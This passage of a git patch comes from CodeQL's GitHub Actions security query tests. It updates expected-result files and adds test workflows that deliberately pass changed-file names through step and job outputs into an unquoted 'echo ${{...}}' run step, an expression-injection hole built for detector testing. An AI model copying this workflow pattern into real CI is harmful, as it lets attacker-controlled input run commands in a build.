+| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -158,7 +158,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | @@ -176,13 +176,13 @@ subpaths | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | @@ -220,7 +220,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index 174f9d49e875..c26769a692e9 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | name: Build and test | Actions Job or Workflow does not set permissions | +| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 169d9c9ac2b1..6620d2ac3852 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,7 +1,7 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | uses: foo/bar@v1 | uses: foo/bar@v1 | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | uses: c ... tion@v2 | uses: c ... tion@v2 | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | uses: f ... n-pr@v1 | uses: f ... n-pr@v1 | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | +| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 76d47eec1912..7527a1e15f2c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1 +1 @@ -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | uses: a ... kout@v2 | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | +| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on 'pull_request_target'. | From 6875640c6439aa6c4faa17f20af2ac43262cacfe Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Mar 2024 10:33:26 +0100 Subject: [PATCH 084/707] Refactor getXXXExpr methods --- ql/lib/codeql/actions/Ast.qll | 54 +++++++++-------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../{inter-job.yml => inter-job0.yml} | 9 ++- .../CWE-094/.github/workflows/inter-job1.yml | 43 +++++++++++++ .../CWE-094/.github/workflows/inter-job2.yml | 45 ++++++++++++++ .../CWE-094/.github/workflows/inter-job4.yml | 44 ++++++++++++++ .../CWE-094/.github/workflows/inter-job5.yml | 45 ++++++++++++++ .../CriticalExpressionInjection.expected | 55 +++++++++++++---- .../CWE-094/ExpressionInjection.expected | 60 +++++++++++++++---- 9 files changed, 307 insertions(+), 50 deletions(-) rename ql/test/query-tests/Security/CWE-094/.github/workflows/{inter-job.yml => inter-job0.yml} (85%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 096f3b9f8033..89afd954d85c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -214,19 +214,20 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVariable(string name) { + StringLiteral getMatrixVar(string name) { super.lookup("matrix").(YamlMapping).lookup(name) = result } - string getAMatrixVariableName() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) - } + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode { +class Needs extends AstNode instanceof YamlMappingLikeNode { Job job; Needs() { job.(YamlMapping).lookup("needs") = this } @@ -234,16 +235,18 @@ class Needs extends AstNode { Job getJob() { result = job } Job getANeededJob() { - if this instanceof YamlString - then - result.getId() = this.(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - else none() + result.getId() = super.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + // if this instanceof YamlString + // then + // result.getId() = this.(YamlString).getValue() and + // result.getLocation().getFile() = job.getLocation().getFile() + // else + // if this instanceof YamlSequence + // then + // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + // result.getLocation().getFile() = job.getLocation().getFile() + // else none() } } @@ -583,29 +586,30 @@ class StepsExpression extends ContextExpression { * e.g. `${{ needs.job1.outputs.foo}}` */ class NeedsExpression extends ContextExpression { - Job job; - string jobId; + Job neededJob; + string neededJobId; string fieldName; NeedsExpression() { expr.regexpMatch(needsCtxRegex()) and - jobId = expr.regexpCapture(needsCtxRegex(), 1) and + neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and - job.getId() = jobId + neededJob.getId() = neededJobId } - predicate usesReusableWorkflow() { job.usesReusableWorkflow() } + predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() } override string getFieldName() { result = fieldName } override AstNode getTarget() { - job.getLocation().getFile() = this.getLocation().getFile() and + neededJob.getLocation().getFile() = this.getLocation().getFile() and + this.getJob().getANeededJob() = neededJob and ( // regular jobs - job.getOutputs() = result + neededJob.getOutputs() = result or // reusable workflow calling jobs - job.getUses() = result + neededJob.getUses() = result ) } } @@ -701,12 +705,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariable(fieldName) = result and + w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariable(fieldName) = result and + j.getStrategy().getMatrixVar(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index d64c91f7bb77..6015e6336ca2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -215,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariable(_) and l = child.getLocation() + child = super.getAMatrixVar() and l = child.getLocation() | child order by diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml similarity index 85% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 2760a6c3d35f..5ad00b17db93 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -1,6 +1,13 @@ -on: push +jn: push jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + job1: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml new file mode 100644 index 000000000000..4f149a920419 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml @@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: [job0, job1] + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml new file mode 100644 index 000000000000..21fa789d9e7d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -0,0 +1,45 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml new file mode 100644 index 000000000000..aad2d171c1af --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -0,0 +1,44 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml new file mode 100644 index 000000000000..d6b7b2b1b0c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -0,0 +1,45 @@ +jn: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + + steps: + - id: sink + # Should not be reported since job1 is not needed + run: echo ${{needs.job1.outputs.job_output}} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dacd31cf91c9..9d00212e3af4 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -15,11 +15,26 @@ edges | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | 